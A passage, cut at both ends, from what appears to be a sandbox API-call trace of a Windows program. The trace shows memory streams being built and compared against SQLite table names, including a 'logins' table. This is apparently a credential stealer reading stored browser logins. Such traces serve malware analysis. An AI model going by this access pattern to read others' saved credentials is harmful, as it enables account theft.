libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.186] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.186] IStream:LockRegion (This=0x57ea78, libOffset=0x73a, cb=0x0, dwLockType=0x0) returned 0x0 [0590.186] IStream:SetSize (This=0x57ea78, libNewSize=0x52dab7) returned 0x0 [0590.186] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.186] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.186] IStream:LockRegion (This=0x57ea78, libOffset=0x73b, cb=0x0, dwLockType=0x0) returned 0x0 [0590.186] IStream:SetSize (This=0x57ea78, libNewSize=0x52dab7) returned 0x0 [0590.186] LocalAlloc (uFlags=0x40, uBytes=0x880) returned 0x5e6798 [0590.186] CreateStreamOnHGlobal (in: hGlobal=0x0, fDeleteOnRelease=1, ppstm=0x52dacc | out: ppstm=0x52dacc*=0x639fe0) returned 0x0 [0590.186] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.186] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.186] IStream:LockRegion (This=0x57ea78, libOffset=0x73c, cb=0x0, dwLockType=0x0) returned 0x0 [0590.186] IStream:SetSize (This=0x57ea78, libNewSize=0x5e6798) returned 0x0 [0590.186] IStream:Commit (This=0x639fe0, grfCommitFlags=0x5e6798) returned 0x0 [0590.186] LocalFree (hMem=0x5e6798) returned 0x0 [0590.186] IStream:LockRegion (This=0x639fe0, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.186] IStream:LockRegion (This=0x639fe0, libOffset=0x0, cb=0x0, dwLockType=0x0) returned 0x0 [0590.186] IStream:LockRegion (This=0x639fe0, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.186] IStream:LockRegion (This=0x639fe0, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.186] IStream:LockRegion (This=0x639fe0, libOffset=0x0, cb=0x0, dwLockType=0x0) returned 0x0 [0590.186] IStream:SetSize (This=0x639fe0, libNewSize=0x52da77) returned 0x0 [0590.186] LocalAlloc (uFlags=0x40, uBytes=0x94) returned 0x570078 [0590.186] IStream:LockRegion (This=0x639fe0, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.186] IStream:LockRegion (This=0x639fe0, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.186] IStream:LockRegion (This=0x639fe0, libOffset=0x1, cb=0x0, dwLockType=0x0) returned 0x0 [0590.186] IStream:SetSize (This=0x639fe0, libNewSize=0x52da77) returned 0x0 [0590.186] IStream:LockRegion (This=0x639fe0, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.186] IStream:LockRegion (This=0x639fe0, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.186] IStream:LockRegion (This=0x639fe0, libOffset=0x2, cb=0x0, dwLockType=0x0) returned 0x0 [0590.186] IStream:SetSize (This=0x639fe0, libNewSize=0x52da77) returned 0x0 [0590.186] IStream:LockRegion (This=0x639fe0, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.186] IStream:LockRegion (This=0x639fe0, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.186] IStream:LockRegion (This=0x639fe0, libOffset=0x3, cb=0x0, dwLockType=0x0) returned 0x0 [0590.186] IStream:SetSize (This=0x639fe0, libNewSize=0x52da77) returned 0x0 [0590.186] IStream:LockRegion (This=0x639fe0, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.186] IStream:LockRegion (This=0x639fe0, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.186] IStream:LockRegion (This=0x639fe0, libOffset=0x4, cb=0x0, dwLockType=0x0) returned 0x0 [0590.186] IStream:SetSize (This=0x639fe0, libNewSize=0x52da77) returned 0x0 [0590.186] IStream:LockRegion (This=0x639fe0, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.186] IStream:LockRegion (This=0x639fe0, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.186] IStream:LockRegion (This=0x639fe0, libOffset=0x5, cb=0x0, dwLockType=0x0) returned 0x0 [0590.186] IStream:SetSize (This=0x639fe0, libNewSize=0x52da77) returned 0x0 [0590.186] LocalAlloc (uFlags=0x40, uBytes=0x94) returned 0x56ff38 [0590.186] LocalAlloc (uFlags=0x40, uBytes=0x85) returned 0x57c6e0 [0590.186] IStream:LockRegion (This=0x639fe0, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.186] IStream:LockRegion (This=0x639fe0, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.186] IStream:LockRegion (This=0x639fe0, libOffset=0x6, cb=0x0, dwLockType=0x0) returned 0x0 [0590.186] IStream:SetSize (This=0x639fe0, libNewSize=0x57c6e0) returned 0x0 [0590.186] LocalAlloc (uFlags=0x40, uBytes=0x8d) returned 0x58d970 [0590.186] LocalFree (hMem=0x57c6e0) returned 0x0 [0590.186] LocalAlloc (uFlags=0x40, uBytes=0x99) returned 0x5d1978 [0590.186] IStream:LockRegion (This=0x639fe0, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.187] IStream:LockRegion (This=0x639fe0, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.187] IStream:LockRegion (This=0x639fe0, libOffset=0xb, cb=0x0, dwLockType=0x0) returned 0x0 [0590.187] IStream:SetSize (This=0x639fe0, libNewSize=0x5d1978) returned 0x0 [0590.187] LocalAlloc (uFlags=0x40, uBytes=0xa1) returned 0x5d3958 [0590.187] LocalFree (hMem=0x5d1978) returned 0x0 [0590.187] LocalAlloc (uFlags=0x40, uBytes=0x86) returned 0x57c6e0 [0590.187] IStream:LockRegion (This=0x639fe0, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.187] IStream:LockRegion (This=0x639fe0, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.187] IStream:LockRegion (This=0x639fe0, libOffset=0x24, cb=0x0, dwLockType=0x0) returned 0x0 [0590.187] IStream:SetSize (This=0x639fe0, libNewSize=0x57c6e0) returned 0x0 [0590.187] LocalAlloc (uFlags=0x40, uBytes=0x8e) returned 0x58d8d8 [0590.187] LocalFree (hMem=0x57c6e0) returned 0x0 [0590.187] IStream:LockRegion (This=0x639fe0, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.187] IStream:LockRegion (This=0x639fe0, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.187] IStream:LockRegion (This=0x639fe0, libOffset=0x2a, cb=0x0, dwLockType=0x0) returned 0x0 [0590.187] IStream:SetSize (This=0x639fe0, libNewSize=0x52da6b) returned 0x0 [0590.187] LocalAlloc (uFlags=0x40, uBytes=0x8c) returned 0x58d840 [0590.187] LocalAlloc (uFlags=0x40, uBytes=0x88) returned 0x57c6e0 [0590.187] LocalFree (hMem=0x570078) returned 0x0 [0590.187] IUnknown:Release (This=0x639fe0) returned 0x0 [0590.187] lstrcmpiA (lpString1="logins", lpString2="logins") returned 0 [0590.187] lstrcmpA (lpString1="index", lpString2="table") returned -1 [0590.187] LocalFree (hMem=0x58d970) returned 0x0 [0590.187] LocalFree (hMem=0x5d3958) returned 0x0 [0590.187] LocalFree (hMem=0x58d8d8) returned 0x0 [0590.187] LocalFree (hMem=0x58d840) returned 0x0 [0590.187] LocalFree (hMem=0x57c6e0) returned 0x0 [0590.187] LocalFree (hMem=0x56ff38) returned 0x0 [0590.187] IStream:LockRegion (This=0x57ea78, libOffset=0x433, cb=0x0, dwLockType=0x0) returned 0x0 [0590.187] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.187] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.187] IStream:LockRegion (This=0x57ea78, libOffset=0x433, cb=0x0, dwLockType=0x0) returned 0x0 [0590.187] IStream:SetSize (This=0x57ea78, libNewSize=0x52dab7) returned 0x0 [0590.187] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.187] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.187] IStream:LockRegion (This=0x57ea78, libOffset=0x434, cb=0x0, dwLockType=0x0) returned 0x0 [0590.187] IStream:SetSize (This=0x57ea78, libNewSize=0x52dab7) returned 0x0 [0590.187] LocalAlloc (uFlags=0x40, uBytes=0x880) returned 0x5e6798 [0590.187] CreateStreamOnHGlobal (in: hGlobal=0x0, fDeleteOnRelease=1, ppstm=0x52dacc | out: ppstm=0x52dacc*=0x639fe0) returned 0x0 [0590.187] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.187] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.187] IStream:LockRegion (This=0x57ea78, libOffset=0x435, cb=0x0, dwLockType=0x0) returned 0x0 [0590.187] IStream:SetSize (This=0x57ea78, libNewSize=0x5e6798) returned 0x0 [0590.187] IStream:Commit (This=0x639fe0, grfCommitFlags=0x5e6798) returned 0x0 [0590.187] LocalFree (hMem=0x5e6798) returned 0x0 [0590.187] IStream:LockRegion (This=0x639fe0, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.187] IStream:LockRegion (This=0x639fe0, libOffset=0x0, cb=0x0, dwLockType=0x0) returned 0x0 [0590.187] IStream:LockRegion (This=0x639fe0, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.187] IStream:LockRegion (This=0x639fe0, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.187] IStream:LockRegion (This=0x639fe0, libOffset=0x0, cb=0x0, dwLockType=0x0) returned 0x0 [0590.187] IStream:SetSize (This=0x639fe0, libNewSize=0x52da77) returned 0x0 [0590.187] LocalAlloc (uFlags=0x40, uBytes=0x94) returned 0x56ff38 [0590.187] IStream:LockRegion (This=0x639fe0, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.187] IStream:LockRegion (This=0x639fe0, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.187] IStream:LockRegion (This=0x639fe0, libOffset=0x1, cb=0x0, dwLockType=0x0) returned 0x0 [0590.187] IStream:SetSize (This=0x639fe0, libNewSize=0x52da77) returned 0x0 [0590.187] IStream:LockRegion (This=0x639fe0, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.187] IStream:LockRegion (This=0x639fe0, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.187] IStream:LockRegion (This=0x639fe0, libOffset=0x2, cb=0x0, dwLockType=0x0) returned 0x0 [0590.187] IStream:SetSize (This=0x639fe0, libNewSize=0x52da77) returned 0x0 [0590.187] IStream:LockRegion (This=0x639fe0, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.188] IStream:LockRegion (This=0x639fe0, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.188] IStream:LockRegion (This=0x639fe0, libOffset=0x3, cb=0x0, dwLockType=0x0) returned 0x0 [0590.188] IStream:SetSize (This=0x639fe0, libNewSize=0x52da77) returned 0x0 [0590.188] IStream:LockRegion (This=0x639fe0, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.188] IStream:LockRegion (This=0x639fe0, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.188] IStream:LockRegion (This=0x639fe0, libOffset=0x4, cb=0x0, dwLockType=0x0) returned 0x0 [0590.188] IStream:SetSize (This=0x639fe0, libNewSize=0x52da77) returned 0x0 [0590.188] IStream:LockRegion (This=0x639fe0, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.188] IStream:LockRegion (This=0x639fe0, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.188] IStream:LockRegion (This=0x639fe0, libOffset=0x5, cb=0x0, dwLockType=0x0) returned 0x0 [0590.188] IStream:SetSize (This=0x639fe0, libNewSize=0x52da77) returned 0x0 [0590.188] LocalAlloc (uFlags=0x40, uBytes=0x94) returned 0x570078 [0590.188] LocalAlloc (uFlags=0x40, uBytes=0x85) returned 0x57c6e0 [0590.188] IStream:LockRegion (This=0x639fe0, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.188] IStream:LockRegion (This=0x639fe0, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.188] IStream:LockRegion (This=0x639fe0, libOffset=0x6, cb=0x0, dwLockType=0x0) returned 0x0 [0590.188] IStream:SetSize (This=0x639fe0, libNewSize=0x57c6e0) returned 0x0 [0590.188] LocalAlloc (uFlags=0x40, uBytes=0x8d) returned 0x58d840 [0590.188] LocalFree (hMem=0x57c6e0) returned 0x0 [0590.188] LocalAlloc (uFlags=0x40, uBytes=0x8d) returned 0x58d8d8 [0590.188] IStream:LockRegion (This=0x639fe0, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.188] IStream:LockRegion (This=0x639fe0, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.188] IStream:LockRegion (This=0x639fe0, libOffset=0xb, cb=0x0, dwLockType=0x0) returned 0x0 [0590.188] IStream:SetSize (This=0x639fe0, libNewSize=0x58d8d8) returned 0x0 [0590.188] LocalAlloc (uFlags=0x40, uBytes=0x95) returned 0x56ffd8 [0590.188] LocalFree (hMem=0x58d8d8) returned 0x0 [0590.188] LocalAlloc (uFlags=0x40, uBytes=0x86) returned 0x57c6e0 [0590.188] IStream:LockRegion (This=0x639fe0, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.188] IStream:LockRegion (This=0x639fe0, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.188] IStream:LockRegion (This=0x639fe0, libOffset=0x18, cb=0x0, dwLockType=0x0) returned 0x0 [0590.188] IStream:SetSize (This=0x639fe0, libNewSize=0x57c6e0) returned 0x0 [0590.188] LocalAlloc (uFlags=0x40, uBytes=0x8e) returned 0x58d8d8 [0590.188] LocalFree (hMem=0x57c6e0) returned 0x0 [0590.188] IStream:LockRegion (This=0x639fe0, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.188] IStream:LockRegion (This=0x639fe0, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.188] IStream:LockRegion (This=0x639fe0, libOffset=0x1e, cb=0x0, dwLockType=0x0) returned 0x0 [0590.188] IStream:SetSize (This=0x639fe0, libNewSize=0x52da6b) returned 0x0 [0590.188] LocalAlloc (uFlags=0x40, uBytes=0x8c) returned 0x58d970 [0590.188] LocalAlloc (uFlags=0x40, uBytes=0xb3) returned 0x2ed72a0 [0590.188] IStream:LockRegion (This=0x639fe0, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.188] IStream:LockRegion (This=0x639fe0, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.188] IStream:LockRegion (This=0x639fe0, libOffset=0x1f, cb=0x0, dwLockType=0x0) returned 0x0 [0590.188] IStream:SetSize (This=0x639fe0, libNewSize=0x2ed72a0) returned 0x0 [0590.188] LocalAlloc (uFlags=0x40, uBytes=0xbb) returned 0x5b7378 [0590.188] LocalFree (hMem=0x2ed72a0) returned 0x0 [0590.188] LocalFree (hMem=0x56ff38) returned 0x0 [0590.188] IUnknown:Release (This=0x639fe0) returned 0x0 [0590.188] lstrcmpiA (lpString1="logins", lpString2="logins") returned 0 [0590.188] lstrcmpA (lpString1="index", lpString2="table") returned -1 [0590.188] LocalFree (hMem=0x58d840) returned 0x0 [0590.188] LocalFree (hMem=0x56ffd8) returned 0x0 [0590.188] LocalFree (hMem=0x58d8d8) returned 0x0 [0590.188] LocalFree (hMem=0x58d970) returned 0x0 [0590.188] LocalFree (hMem=0x5b7378) returned 0x0 [0590.188] LocalFree (hMem=0x570078) returned 0x0 [0590.188] IStream:LockRegion (This=0x57ea78, libOffset=0x345, cb=0x0, dwLockType=0x0) returned 0x0 [0590.188] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.188] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.188] IStream:LockRegion (This=0x57ea78, libOffset=0x345, cb=0x0, dwLockType=0x0) returned 0x0 [0590.188] IStream:SetSize (This=0x57ea78, libNewSize=0x52dab7) returned 0x0 [0590.188] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.188] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.188] IStream:LockRegion (This=0x57ea78, libOffset=0x346, cb=0x0, dwLockType=0x0) returned 0x0 [0590.188] IStream:SetSize (This=0x57ea78, libNewSize=0x52dab7) returned 0x0 [0590.189] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.189] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.189] IStream:LockRegion (This=0x57ea78, libOffset=0x347, cb=0x0, dwLockType=0x0) returned 0x0 [0590.189] IStream:SetSize (This=0x57ea78, libNewSize=0x52dab7) returned 0x0 [0590.189] LocalAlloc (uFlags=0x40, uBytes=0x880) returned 0x5e6798 [0590.189] CreateStreamOnHGlobal (in: hGlobal=0x0, fDeleteOnRelease=1, ppstm=0x52dacc | out: ppstm=0x52dacc*=0x639fe0) returned 0x0 [0590.189] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.189] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.189] IStream:LockRegion (This=0x57ea78, libOffset=0x348, cb=0x0, dwLockType=0x0) returned 0x0 [0590.189] IStream:SetSize (This=0x57ea78, libNewSize=0x5e6798) returned 0x0 [0590.189] IStream:Commit (This=0x639fe0, grfCommitFlags=0x5e6798) returned 0x0 [0590.189] LocalFree (hMem=0x5e6798) returned 0x0 [0590.189] IStream:LockRegion (This=0x639fe0, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.189] IStream:LockRegion (This=0x639fe0, libOffset=0x0, cb=0x0, dwLockType=0x0) returned 0x0 [0590.189] IStream:LockRegion (This=0x639fe0, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.189] IStream:LockRegion (This=0x639fe0, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.189] IStream:LockRegion (This=0x639fe0, libOffset=0x0, cb=0x0, dwLockType=0x0) returned 0x0 [0590.189] IStream:SetSize (This=0x639fe0, libNewSize=0x52da77) returned 0x0 [0590.189] LocalAlloc (uFlags=0x40, uBytes=0x98) returned 0x570078 [0590.189] IStream:LockRegion (This=0x639fe0, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.189] IStream:LockRegion (This=0x639fe0, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.189] IStream:LockRegion (This=0x639fe0, libOffset=0x1, cb=0x0, dwLockType=0x0) returned 0x0 [0590.189] IStream:SetSize (This=0x639fe0, libNewSize=0x52da77) returned 0x0 [0590.189] IStream:LockRegion (This=0x639fe0, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.189] IStream:LockRegion (This=0x639fe0, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.189] IStream:LockRegion (This=0x639fe0, libOffset=0x2, cb=0x0, dwLockType=0x0) returned 0x0 [0590.189] IStream:SetSize (This=0x639fe0, libNewSize=0x52da77) returned 0x0 [0590.189] IStream:LockRegion (This=0x639fe0, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.189] IStream:LockRegion (This=0x639fe0, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.189] IStream:LockRegion (This=0x639fe0, libOffset=0x3, cb=0x0, dwLockType=0x0) returned 0x0 [0590.189] IStream:SetSize (This=0x639fe0, libNewSize=0x52da77) returned 0x0 [0590.189] IStream:LockRegion (This=0x639fe0, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.189] IStream:LockRegion (This=0x639fe0, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.189] IStream:LockRegion (This=0x639fe0, libOffset=0x4, cb=0x0, dwLockType=0x0) returned 0x0 [0590.189] IStream:SetSize (This=0x639fe0, libNewSize=0x52da77) returned 0x0 [0590.189] IStream:LockRegion (This=0x639fe0, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.189] IStream:LockRegion (This=0x639fe0, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.189] IStream:LockRegion (This=0x639fe0, libOffset=0x5, cb=0x0, dwLockType=0x0) returned 0x0 [0590.189] IStream:SetSize (This=0x639fe0, libNewSize=0x52da77) returned 0x0 [0590.189] IStream:LockRegion (This=0x639fe0, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.189] IStream:LockRegion (This=0x639fe0, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.189] IStream:LockRegion (This=0x639fe0, libOffset=0x6, cb=0x0, dwLockType=0x0) returned 0x0 [0590.189] IStream:SetSize (This=0x639fe0, libNewSize=0x52da77) returned 0x0 [0590.189] LocalAlloc (uFlags=0x40, uBytes=0x94) returned 0x56ffd8 [0590.189] LocalAlloc (uFlags=0x40, uBytes=0x85) returned 0x57c6e0 [0590.189] IStream:LockRegion (This=0x639fe0, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.189] IStream:LockRegion (This=0x639fe0, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.189] IStream:LockRegion (This=0x639fe0, libOffset=0x7, cb=0x0, dwLockType=0x0) returned 0x0 [0590.189] IStream:SetSize (This=0x639fe0, libNewSize=0x57c6e0) returned 0x0 [0590.189] LocalAlloc (uFlags=0x40, uBytes=0x8d) returned 0x58d970 [0590.189] LocalFree (hMem=0x57c6e0) returned 0x0 [0590.189] LocalAlloc (uFlags=0x40, uBytes=0x85) returned 0x57c6e0 [0590.189] IStream:LockRegion (This=0x639fe0, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.189] IStream:LockRegion (This=0x639fe0, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.189] IStream:LockRegion (This=0x639fe0, libOffset=0xc, cb=0x0, dwLockType=0x0) returned 0x0 [0590.189] IStream:SetSize (This=0x639fe0, libNewSize=0x57c6e0) returned 0x0 [0590.189] LocalAlloc (uFlags=0x40, uBytes=0x8d) returned 0x58d8d8 [0590.189] LocalFree (hMem=0x57c6e0) returned 0x0 [0590.189] LocalAlloc (uFlags=0x40, uBytes=0x85) returned 0x57c6e0 [0590.189] IStream:LockRegion (This=0x639fe0, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.189] IStream:LockRegion (This=0x639fe0, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.190] IStream:LockRegion (This=0x639fe0, libOffset=0x11, cb=0x0, dwLockType=0x0) returned 0x0 [0590.190] IStream:SetSize (This=0x639fe0, libNewSize=0x57c6e0) returned 0x0 [0590.190] LocalAlloc (uFlags=0x40, uBytes=0x8d) returned 0x58d840 [0590.190] LocalFree (hMem=0x57c6e0) returned 0x0 [0590.190] IStream:LockRegion (This=0x639fe0, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.190] IStream:LockRegion (This=0x639fe0, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.190] IStream:LockRegion (This=0x639fe0, libOffset=0x16, cb=0x0, dwLockType=0x0) returned 0x0 [0590.190] IStream:SetSize (This=0x639fe0, libNewSize=0x52da6b) returned 0x0 [0590.190] LocalAlloc (uFlags=0x40, uBytes=0x8c) returned 0x58d548 [0590.190] LocalAlloc (uFlags=0x40, uBytes=0x129) returned 0x63b4a0 [0590.190] IStream:LockRegion (This=0x639fe0, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.190] IStream:LockRegion (This=0x639fe0, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.190] IStream:LockRegion (This=0x639fe0, libOffset=0x17, cb=0x0, dwLockType=0x0) returned 0x0 [0590.190] IStream:SetSize (This=0x639fe0, libNewSize=0x63b4a0) returned 0x0 [0590.190] LocalAlloc (uFlags=0x40, uBytes=0x131) returned 0x56c820 [0590.190] LocalFree (hMem=0x63b4a0) returned 0x0 [0590.190] LocalFree (hMem=0x570078) returned 0x0 [0590.190] IUnknown:Release (This=0x639fe0) returned 0x0 [0590.190] lstrcmpiA (lpString1="stats", lpString2="logins") returned 1 [0590.190] LocalFree (hMem=0x58d970) returned 0x0 [0590.190] LocalFree (hMem=0x58d8d8) returned 0x0 [0590.190] LocalFree (hMem=0x58d840) returned 0x0 [0590.190] LocalFree (hMem=0x58d548) returned 0x0 [0590.190] LocalFree (hMem=0x56c820) returned 0x0 [0590.190] LocalFree (hMem=0x56ffd8) returned 0x0 [0590.190] IStream:LockRegion (This=0x57ea78, libOffset=0x408, cb=0x0, dwLockType=0x0) returned 0x0 [0590.190] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.190] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.190] IStream:LockRegion (This=0x57ea78, libOffset=0x408, cb=0x0, dwLockType=0x0) returned 0x0 [0590.190] IStream:SetSize (This=0x57ea78, libNewSize=0x52dab7) returned 0x0 [0590.190] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.190] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.190] IStream:LockRegion (This=0x57ea78, libOffset=0x409, cb=0x0, dwLockType=0x0) returned 0x0 [0590.190] IStream:SetSize (This=0x57ea78, libNewSize=0x52dab7) returned 0x0 [0590.190] LocalAlloc (uFlags=0x40, uBytes=0x880) returned 0x5e6798 [0590.190] CreateStreamOnHGlobal (in: hGlobal=0x0, fDeleteOnRelease=1, ppstm=0x52dacc | out: ppstm=0x52dacc*=0x639fe0) returned 0x0 [0590.190] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.190] IStream:LockRegion (This=0x57ea78, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.190] IStream:LockRegion (This=0x57ea78, libOffset=0x40a, cb=0x0, dwLockType=0x0) returned 0x0 [0590.190] IStream:SetSize (This=0x57ea78, libNewSize=0x5e6798) returned 0x0 [0590.190] IStream:Commit (This=0x639fe0, grfCommitFlags=0x5e6798) returned 0x0 [0590.190] LocalFree (hMem=0x5e6798) returned 0x0 [0590.190] IStream:LockRegion (This=0x639fe0, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.190] IStream:LockRegion (This=0x639fe0, libOffset=0x0, cb=0x0, dwLockType=0x0) returned 0x0 [0590.190] IStream:LockRegion (This=0x639fe0, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.190] IStream:LockRegion (This=0x639fe0, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.190] IStream:LockRegion (This=0x639fe0, libOffset=0x0, cb=0x0, dwLockType=0x0) returned 0x0 [0590.190] IStream:SetSize (This=0x639fe0, libNewSize=0x52da77) returned 0x0 [0590.190] LocalAlloc (uFlags=0x40, uBytes=0x94) returned 0x56ffd8 [0590.190] IStream:LockRegion (This=0x639fe0, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.190] IStream:LockRegion (This=0x639fe0, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.190] IStream:LockRegion (This=0x639fe0, libOffset=0x1, cb=0x0, dwLockType=0x0) returned 0x0 [0590.190] IStream:SetSize (This=0x639fe0, libNewSize=0x52da77) returned 0x0 [0590.190] IStream:LockRegion (This=0x639fe0, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.190] IStream:LockRegion (This=0x639fe0, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.190] IStream:LockRegion (This=0x639fe0, libOffset=0x2, cb=0x0, dwLockType=0x0) returned 0x0 [0590.190] IStream:SetSize (This=0x639fe0, libNewSize=0x52da77) returned 0x0 [0590.190] IStream:LockRegion (This=0x639fe0, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0590.190] IStream:LockRegion (This=0x639fe0, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0590.190] IStream:LockRegion (This=0x639fe0, libOffset=0x3, cb=0x0, dwLockType=0x0) returned 0x0 [0590.190] IStream:SetSize (This=0x639fe0, libNewSize=0x52da77) returned 0x0 [0590.190] IStream:LockRegion (This=0x639fe0, libOffset=0x0, cb=0x0, 